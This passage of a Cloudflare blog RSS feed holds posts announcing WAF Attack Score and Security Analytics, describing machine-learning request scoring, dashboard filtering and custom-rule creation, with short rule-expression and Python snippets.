    <p>In order to enable WAF Attack Score Lite and Security Analytics, you don’t need to take any action. The HTTP machine learning inspection rollout starts today, and Security Analytics will appear automatically for all Business plan customers once the rollout completes in the upcoming weeks.</p><p>It’s worth mentioning that having the detection on and viewing the attack analysis in Security Analytics does not mean you’re blocking traffic. It only offers insights and provides the freedom to create rules and mitigate the desired requests. To take action, you need to create a rule that blocks or challenges the unwanted traffic.</p>
    <div>
      <h3>A common use case</h3>
      <a href="#a-common-use-case">
        
      </a>
    </div>
    <p>Consider an attacker executing an attack using automated web requests to manipulate or disrupt web applications. One of the best ways to identify this type of traffic and mitigate these requests is by combining bot score with WAF Attack Score.</p><p>1- Go to the Security Analytics dashboard under <b>Security &gt; Analytics</b>. On the right-hand side the Attack Analysis indicates the attack class. In this case, I can select “Attack” to apply a single filter, or use the quick filters under <b>Insights</b> to propagate multiple filters at once. In addition to the attack class, I can also select the Bot “Automated” filter.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/KlXR4rLThAGb3qmUUFU9i/483db68c4de0d993860841df1d79185a/pasted-image-0--1--5.png" />
            
            </figure><p>2- After filtering, Security Analytics lets me scroll down to the sampled logs and validate the results:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1wuVzh2HNPEH76qnFPfhVg/7bfd3a508245e5d1bebf55a08b74729d/pasted-image-0--2--3.png" />
            
            </figure><p>3- Once the selected requests are confirmed, I can select the <b>Create WAF Custom Rules</b> option which will direct me to the Security Events with the pre-assigned filters to deploy a rule. In this case, I want to challenge the requests matched by the rule:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3BvqWU3mvDlOT3Zpq0nHfg/7938183b46471442c49cce6c19428dde/pasted-image-0--3--3.png" />
            
            </figure><p>And voila! You have a new rule that challenges traffic matching any automated attack variation.</p>
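<p>For reference, the rule created through the dashboard corresponds to an expression combining the two signals. A hedged sketch: the field names follow Cloudflare's Rules language, and using a bot score below 30 to stand in for "automated" is an assumption of this example:</p>

```python
# Sketch of the combined-signal rule: challenge requests that are
# both classified as attacks and scored as automated traffic.
# The bot-score threshold of 30 is an illustrative assumption.
expression = (
    '(cf.waf.score.class eq "attack" '
    'and cf.bot_management.score lt 30)'
)
rule = {"expression": expression, "action": "managed_challenge"}
print(rule)
```

<p>Tightening or loosening either side of the conjunction adjusts how aggressive the rule is.</p>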
    <div>
      <h3>Next steps</h3>
      <a href="#next-steps">
        
      </a>
    </div>
    <p>We have been working hard to provide maximum security and visibility for all our customers. This is only one step on this road! We will keep adding more product-focused analytics, and providing additional security against unknown attacks. Try it out, create a rule, and don’t hesitate to contact our sales team if you need the full version of WAF Attack Score.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <guid isPermaLink="false">5GzyVBcAZXi7cH3YQKU1SL</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Security Analytics provides a comprehensive view across all your traffic]]></title>
            <link>https://blog.cloudflare.com/security-analytics/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fqA2JqcTEUftqWAiKfPHt/14eaa1a9b78a1785a3bd449a776eb204/unnamed-1.png" />
            
            </figure><p>An application proxying traffic through Cloudflare benefits from a wide range of easy to use security features including <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Bot Management and DDoS mitigation. To understand if traffic has been blocked by Cloudflare we have built a powerful <a href="/new-firewall-tab-and-analytics/">Security Events</a> dashboard that allows you to examine any mitigation events. Application owners often wonder though what happened to the rest of their traffic. Did they block all traffic that was detected as malicious?</p><p>Today, along with our announcement of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, we are also launching our new Security Analytics.</p><p>Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated.</p>
    <div>
      <h2>Detect then mitigate</h2>
      <a href="#detect-then-mitigate">
        
      </a>
    </div>
    <p>Imagine you just onboarded your application to Cloudflare and without any additional effort, each HTTP request is analyzed by the Cloudflare network. Analytics are therefore enriched with attack analysis, bot analysis and any other security signal provided by Cloudflare.</p><p>Right away, without any risk of causing false positives, you can view the entirety of your traffic to explore what is happening, when and where.</p><p>This allows you to dive straight into analyzing the results of these signals, shortening the time taken to deploy active blocking mitigations and boosting your confidence in making decisions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2gYype09S9vHFehn1Ltvln/a333ca9cdf3dd7397e9a012dbd758134/image6-1.png" />
            
            </figure><p>We are calling this approach “<i>detect then mitigate”</i> and we have already received very positive feedback from early access customers.</p><p>In fact, Cloudflare’s Bot Management has been <a href="/introducing-bot-analytics/">using this model</a> for the past two years. We constantly hear feedback from our customers that with greater visibility, they have a high confidence in our bot scoring solution. To further support this new way of securing your web applications and bringing together all our intelligent signals, we have designed and developed the new Security Analytics which starts bringing signals from the WAF and other security products to follow this model.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4GSZTeBSY0shIKt5dTE66k/fd166416500386e0549c6e7ad460bc8d/image4-6.png" />
            
            </figure>
    <div>
      <h2>New Security Analytics</h2>
      <a href="#new-security-analytics">
        
      </a>
    </div>
    <p>Built on top of the success of our analytics experiences, the new Security Analytics employs existing components such as top statistics and in-context quick filters, combined with a new page layout that allows rapid exploration and validation. The following sections break down this new page layout, forming a high-level workflow.</p><p>The key difference between Security Analytics and Security Events is that the former is based on HTTP requests, giving visibility into your entire site’s traffic, while Security Events uses a different dataset that visualizes every match with an active security rule.</p>
    <div>
      <h3>Define a focus</h3>
      <a href="#define-a-focus">
        
      </a>
    </div>
    <p>The new Security Analytics visualizes the dataset of sampled HTTP requests across your entire application, the same as <a href="/introducing-bot-analytics/">Bot Analytics</a>. When validating the “<i>detect then mitigate”</i> model with selected customers, a common behavior we observed is using the top N statistics to quickly narrow down to either obvious anomalies or certain parts of the application. Based on this insight, the page starts with selected top N statistics covering both request sources and request destinations, which can be expanded to view all available statistics. Questions like “How well is my application admin’s area protected?” are answered with one or two quick filter clicks in this area.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eVviZy7T8NtFwd5igw3Y7/a573e8bc96b2d8bc788ff483c1dc4189/image2-8.png" />
            
            </figure>
    <div>
      <h3>Spot anomalies in trends</h3>
      <a href="#spot-anomalies-in-trends">
        
      </a>
    </div>
    <p>After a preliminary focus is defined, the core of the interface is dedicated to plotting trends over time. The time series chart has proven to be a powerful tool for spotting traffic anomalies, and it allows plotting based on different criteria. Whenever there is a spike, it is likely that an attack or attack attempt has happened.</p><p>As mentioned above, unlike <a href="/new-firewall-tab-and-analytics/">Security Events</a>, the dataset used on this page is HTTP requests, which includes both mitigated and non-mitigated requests. By <a href="/application-security/#definitions">mitigated requests</a> here, we mean “any HTTP request that had a ‘terminating’ action applied by the Cloudflare platform”. The remaining requests that have not been mitigated are either served by Cloudflare’s cache or reach the origin. In a case such as a spike in non-mitigated requests while mitigated requests stay flat, a reasonable hypothesis is that an attack did not match any active WAF rule. In this example, you can filter on non-mitigated requests with one click right in the chart, which updates all the data visualized on this page to support further investigation.</p><p>In addition to the default plotting of non-mitigated and mitigated requests, you can also choose to plot trends of either attack analysis or bot analysis, allowing you to spot anomalies in attack or bot behavior.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68ZPoNtii7Si5DF06pxVVY/cec0589f2c78dc23cc9501cdb070bfa2/image7-2.png" />
            
            </figure>
    <div>
      <h3>Zoom in with analysis signals</h3>
      <a href="#zoom-in-with-analysis-signals">
        
      </a>
    </div>
    <p>One of the analysis signals our customers love and trust most is the bot score. With the latest addition of <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a> and <a href="https://developers.cloudflare.com/waf/about/content-scanning/">content scanning</a>, we are bringing them together into one analytics page, helping you zoom further into your traffic based on these signals. Combining them enables you to answer scenarios that were not possible until now:</p><ul><li><p>Attack requests made by (definite) automated sources</p></li><li><p>Likely attack requests made by humans</p></li><li><p>Content uploaded with/without malicious content made by bots</p></li></ul><p>Once a scenario is filtered on, the data visualization of the entire page, including the top N statistics, the HTTP requests trend, and the sampled logs, is updated, allowing you to spot anomalies in either the top N statistics or the time-based HTTP requests trend.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L7LxXT1BLhWp71Im6heox/d8e9155a5e0e81f1bf0236a272509d0a/image3-3.png" />
            
            </figure>
    <div>
      <h3>Review sampled logs</h3>
      <a href="#review-sampled-logs">
        
      </a>
    </div>
    <p>After zooming into a specific part of your traffic that may be an anomaly, sampled logs provide a detailed view to verify your finding per HTTP request. This is a crucial step in a security investigation workflow, as confirmed by the high engagement rate we observe when such logs are examined in Security Events. As we add more data to each log entry, the expanded log view becomes less readable, so we have redesigned it: it starts with how Cloudflare responded to a request, followed by our analysis signals, and lastly the key components of the raw request itself. By reviewing these details, you can validate your hypothesis of an anomaly and decide whether any mitigation action is required.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3gJjGLYzonj0aPVZLIKC6S/9cc34a61775198999e4f1eb8c4dd90f6/image5-3.png" />
            
            </figure>
    <div>
      <h3>Handy insights to get started</h3>
      <a href="#handy-insights-to-get-started">
        
      </a>
    </div>
    <p>When testing the prototype of this analytics dashboard internally, we learned that this flexibility comes with a steeper learning curve. To help you get started, we designed a handy <i>insights</i> panel. These insights are crafted to highlight specific perspectives on your total traffic. A single click on any insight applies a preset of filters, zooming directly onto the portion of your traffic that you are interested in. From there, you can review the sampled logs or further fine-tune any of the applied filters. Further internal studies have shown this to be a highly efficient workflow, and in many cases it will be your starting point for using this dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1l8PBc150OLKligyn93h76/bc692e61e0f0d8c11ec1719c3195a169/image1-11.png" />
            
            </figure>
    <div>
      <h2>How can I get it?</h2>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>The new Security Analytics is being gradually rolled out to all Enterprise customers who have purchased the new Application Security Core or Advanced Bundles. We plan to roll this out to all other customers in the near future. This new view will be alongside the existing Security Events dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Q5OP1vAN2KM82LN4vBqp2/b7944b44d8d7bb03baa8b39909c72f16/image8-2.png" />
            
            </figure>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We are still at an early stage moving towards the “<i>detect then mitigate”</i> model, empowering you with greater visibility and intelligence to better protect your web applications. While we are working on enabling more detection capabilities, please share your thoughts and feedback with us to help us improve the experience. If you want to get access sooner, reach out to your account team to get started!</p> ]]></content:encoded>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">38y228bpRNFVIIfHyptrzx</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Stop attacks before they are known: making the Cloudflare WAF smarter]]></title>
            <link>https://blog.cloudflare.com/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are making the WAF smarter by increasing availability of our new machine learning powered enhancement, the WAF Attack Score! ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Y8psmovGouHLkHICnduJb/739b4209e553b9e87f163ef8662e1a51/image5-2.png" />
            
            </figure><p><a href="https://www.cloudflare.com/waf/">Cloudflare’s WAF</a> helps site owners keep their application safe from attackers. It does this by analyzing traffic with the <a href="https://developers.cloudflare.com/waf/managed-rulesets/reference/cloudflare-managed-ruleset/">Cloudflare Managed Rules</a>: handwritten highly specialized rules that detect and stop malicious payloads. But they have a problem: if a rule is not written for a specific attack, it will not detect it.</p><p>Today, we are solving this problem by making our <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> smarter and announcing our WAF attack scoring system in general availability.</p><p>Customers on our Enterprise Core and Advanced Security bundles will have gradual access to this new feature. All remaining Enterprise customers will gain access over the coming months.</p><p>Our WAF attack scoring system, fully complementary to our Cloudflare Managed Rules, classifies all requests using a model trained on observed true positives across the Cloudflare network, allowing you to detect (and block) evasion, bypass and new attack techniques before they are publicly known.</p>
    <div>
      <h2>The problem with signature based WAFs</h2>
      <a href="#the-problem-with-signature-based-wafs">
        
      </a>
    </div>
    <p>Attackers trying to infiltrate web applications often use known or recently disclosed payloads. The Cloudflare WAF has been built to handle these attacks very well. The Cloudflare Managed Ruleset and the Cloudflare <a href="https://en.wikipedia.org/wiki/OWASP">OWASP</a> Managed Ruleset are continuously updated and aimed at protecting web applications against known threats while minimizing false positives.</p><p>Things become harder with attacks that are not publicly known, often referred to as <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)">zero-days</a>. While our teams do their best to research new threat vectors and keep the Cloudflare Managed rules updated, human speed becomes a limiting factor. Every time a new vector is found, a window of opportunity opens for attackers to bypass mitigations.</p><p>One well-known example was the <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">Log4j RCE attack</a>, where we had to deploy frequent rule updates as new bypasses were discovered that changed the known <a href="/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/">attack patterns</a>.</p>
    <div>
      <h2>The solution: complement signatures with a machine learning scoring model</h2>
      <a href="#the-solution-complement-signatures-with-a-machine-learning-scoring-model">
        
      </a>
    </div>
    <p>Our WAF attack scoring system is a machine-learning-powered enhancement to Cloudflare’s WAF. It scores every request with a probability of it being malicious. You can then use this score when implementing WAF Custom Rules to keep your application safe alongside existing Cloudflare Managed Rules.</p>
    <div>
      <h3>How do we use machine learning in Cloudflare’s WAF?</h3>
      <a href="#how-do-we-use-machine-learning-in-cloudflares-waf">
        
      </a>
    </div>
    <p>In any classification problem, the quality of the training set directly relates to the quality of the classification output, so a lot of effort was put into preparing the training data.</p><p>And this is where we used a Cloudflare superpower: we took advantage of Cloudflare’s network visibility by gathering millions of true positive samples generated by our existing signature based WAF and further enhanced them using techniques covered in “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”.</p><p>This allowed us to train a <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">model</a> that is able to classify, given an HTTP request, the probability that the request contains a malicious payload, but more importantly, to classify when a request is very similar to a known true positive yet sufficiently different to avoid a managed rule match.</p><p>The model runs inline to HTTP traffic and as of today it is optimized for three attack categories: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/threats/cross-site-scripting/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE. We plan to add additional attack types in the future.</p><p>The output scores are similar to the <a href="/introducing-bot-analytics/">Bot Management</a> scores: they range between 1 and 99, where low scores indicate a malicious or likely malicious request and high scores indicate a clean or likely clean one.</p>
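<p>To make the score bands concrete, here is a small illustrative mapping from a raw 1–99 score to the class labels used elsewhere in this post; the band boundaries (20/50/80) are assumptions made for this sketch, not Cloudflare's published cutoffs:</p>

```python
# Illustrative score-to-class mapping. The 1-99 range and the
# "low = malicious, high = clean" direction come from the post;
# the specific boundaries 20/50/80 are assumptions.
def classify(score: int) -> str:
    if not 1 <= score <= 99:
        raise ValueError("attack score ranges from 1 to 99")
    if score < 20:
        return "attack"
    if score < 50:
        return "likely_attack"
    if score < 80:
        return "likely_clean"
    return "clean"

print(classify(5))   # attack  (low scores indicate malicious)
print(classify(95))  # clean   (high scores indicate clean)
```

<p>In practice you would express such thresholds directly in a custom rule rather than in application code.</p>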
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/57Kl8w8yxxC4ZZ7DOu2tUB/aeb585344cca76782bb44949547d22f5/image4-5.png" />
            
            </figure>
    <div>
      <h3>Proving immediate value</h3>
      <a href="#proving-immediate-value">
        
      </a>
    </div>
    <p>As one example of the effectiveness of this new system, on October 13, 2022, <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-42889">CVE-2022-42889</a> was identified as a critical-severity vulnerability in <a href="https://github.com/apache/commons-text">Apache Commons Text</a>, affecting versions 1.5 through 1.9.</p><p>The payload used in the attack, although not immediately blocked by our Cloudflare Managed Rules, was correctly identified (by scoring very low) by our attack scoring system. This allowed us to protect endpoints and identify the attack with zero time to deploy. Of course, we still updated the Cloudflare Managed Rules to cover the new attack vector, as this allows us to improve our training data further, completing our feedback loop.</p>
    <div>
      <h2>Know what you don’t know with the new Security Analytics</h2>
      <a href="#know-what-you-dont-know-with-the-new-security-analytics">
        
      </a>
    </div>
    <p>In addition to the attack scoring system, we have another big announcement: our new Security Analytics! You can read more about it in <a href="/security-analytics">the official announcement</a>.</p><p>Using the new Security Analytics, you can view the attack score distribution regardless of whether requests were blocked, allowing you to explore potentially malicious attacks before deploying any rules.</p><p>The view shows not only the WAF Attack Score but also Bot Management and Content Scanning, with the ability to mix and match filters as you desire.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MJ8mVGxP5c3qKrOMXs0H9/133a8f226856815f52cd8eb720b4d58c/image1-10.png" />
            
            </figure>
    <div>
      <h2>How to use the WAF Attack Score and Security Analytics</h2>
      <a href="#how-to-use-the-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Let’s go on a tour to spot attacks using the new Security Analytics, and then use the WAF Attack Scores to mitigate them.</p>
    <div>
      <h3>Starting with Security Analytics</h3>
      <a href="#starting-with-security-analytics">
        
      </a>
    </div>
    <p>This new view has the power to show you everything about your traffic in one place. You have tens of filters to mix and match, top statistics, and multiple interactive graph distributions, as well as log samples to verify your insights. In essence, this gives you the ability to preview any number of filters without needing to create WAF Custom Rules in the first place.</p><p><b>Step 1</b> - access the new Security Analytics: To access the new Security Analytics in the dashboard, head over to the “Security” tab (<b>Security &gt; Analytics</b>); the previous view (<b>Security &gt; Overview</b>) still exists under (<b>Security &gt; Events</b>). For the time being, you must have access to at least the WAF Attack Score to see the new Security Analytics.</p><p><b>Step 2</b> - explore insights: On the new analytics page, you will see the time distribution of your entire traffic, along with many filters on the right side showing distributions for several signals, including the WAF Attack Score and the Bot Management score. To make it easy to apply interesting filters, we added the “Insights” section.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3V7Pd5okduXI6BO4jeap8x/3c83d5906069bab7c8f9f379e5b8f917/image7.png" />
            
            </figure><p>By choosing the “Attack Analysis” option, you see a stacked chart overview of your traffic from the WAF Attack Score perspective.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/135BsLRB5Hu7wQ9LjylJ9P/878088234864a20d5937a3c3384486bd/image6.png" />
            
            </figure><p><b>Step 3</b> - filter on attack traffic: A good place to start is to look for unmitigated HTTP requests classified as attacks. You can do this by using the attack score sliders on the right-hand side, or by selecting any of the Insights filters, which are easy-to-use, one-click shortcuts. All charts will update automatically according to the selected filters.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OzYL2gC8J4Eul4rGy7WTZ/82f2d21878900893672b8fcac74571f6/image8.png" />
            
            </figure><p><b>Step 4</b> - verify the attack traffic: This can be done by expanding the sampled logs below the traffic distribution graph. For instance, in the expanded log below, you can see a very low RCE score indicating an “Attack”, along with a Bot score indicating that the request was “Likely Automated”. Looking at the “Path” field, we can confirm that this is indeed a malicious request. Note that not all fields are currently logged or shown; for example, a request might receive a low score due to a malicious payload in the HTTP body, which cannot easily be verified in the sampled logs today.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EBEaIA2jadEY4X65fR3Sd/079466cb5fba24e54ef2eddf00fe0352/image3-2.png" />
            
            </figure><p><b>Step 5</b> - create a rule to mitigate the attack traffic: Once you have verified that your filter is not matching false positives, a single click on the “Create custom rule” button takes you to the WAF Custom Rules builder with all your filters pre-populated and ready for you to “Deploy”.</p>
    <div>
      <h3>Attack scores in Security Event logs</h3>
      <a href="#attack-scores-in-security-event-logs">
        
      </a>
    </div>
    <p>WAF Attack Scores are also available in <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/">HTTP logs</a>, and in the dashboard under (<b>Security &gt; Events</b>) when expanding any of the event log samples:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ypnJCxaCSKPyKpplU9ZpZ/1265e36223de98d5714a8f113173cc40/image2-7.png" />
            
            </figure><p>Note that all the new fields are available in WAF Custom Rules and WAF Rate Limiting Rules. These are documented in our developer <a href="https://developers.cloudflare.com/waf/about/waf-ml/">docs</a>: <code>cf.waf.score</code>, <code>cf.waf.score.xss</code>, <code>cf.waf.score.sqli</code>, and <code>cf.waf.score.rce</code>.</p><p>Although the easiest way to use these fields is to start from the new Security Analytics dashboard as described above, you can also use them directly when building rules, combining them with any other available field. The following example deploys a rule with a “Log” action for any request with an aggregate WAF Attack Score (<code>cf.waf.score</code>) below 40.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Ij7IQl7b2fRa5Gmv3Cofo/e6e7a823b8e58f45af324abc40c2e0bd/image9.png" />
            
            </figure>
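    <p>For teams that automate rule deployment instead of using the dashboard, the same rule can be written with the fields listed above in the Rules language expression syntax. The sketch below only builds the JSON body for such a rule; the surrounding API call (endpoint, zone ID, authentication) is deliberately omitted and should be taken from Cloudflare’s API documentation.</p>

```python
import json

# Sketch: the payload for a "Log" custom rule matching requests whose
# aggregate WAF Attack Score is below 40. The Rulesets API call around
# this payload (endpoint URL, zone ID, auth token) is intentionally
# omitted; consult the official API docs before use.
rule = {
    "action": "log",
    "expression": "cf.waf.score lt 40",  # same filter as the dashboard example
    "description": "Log likely-attack requests (aggregate score < 40)",
}

body = json.dumps({"rules": [rule]}, indent=2)
print(body)
```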
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>This is just step one of many to make the Cloudflare WAF truly “intelligent”. In addition to rolling this new technology out to more customers, we are already working on providing even better visibility and covering additional attack vectors. For all that and more, stay tuned!</p> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">1Hx5ZYnFOhSRubpCFHlREO</guid>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
    </channel>
</rss>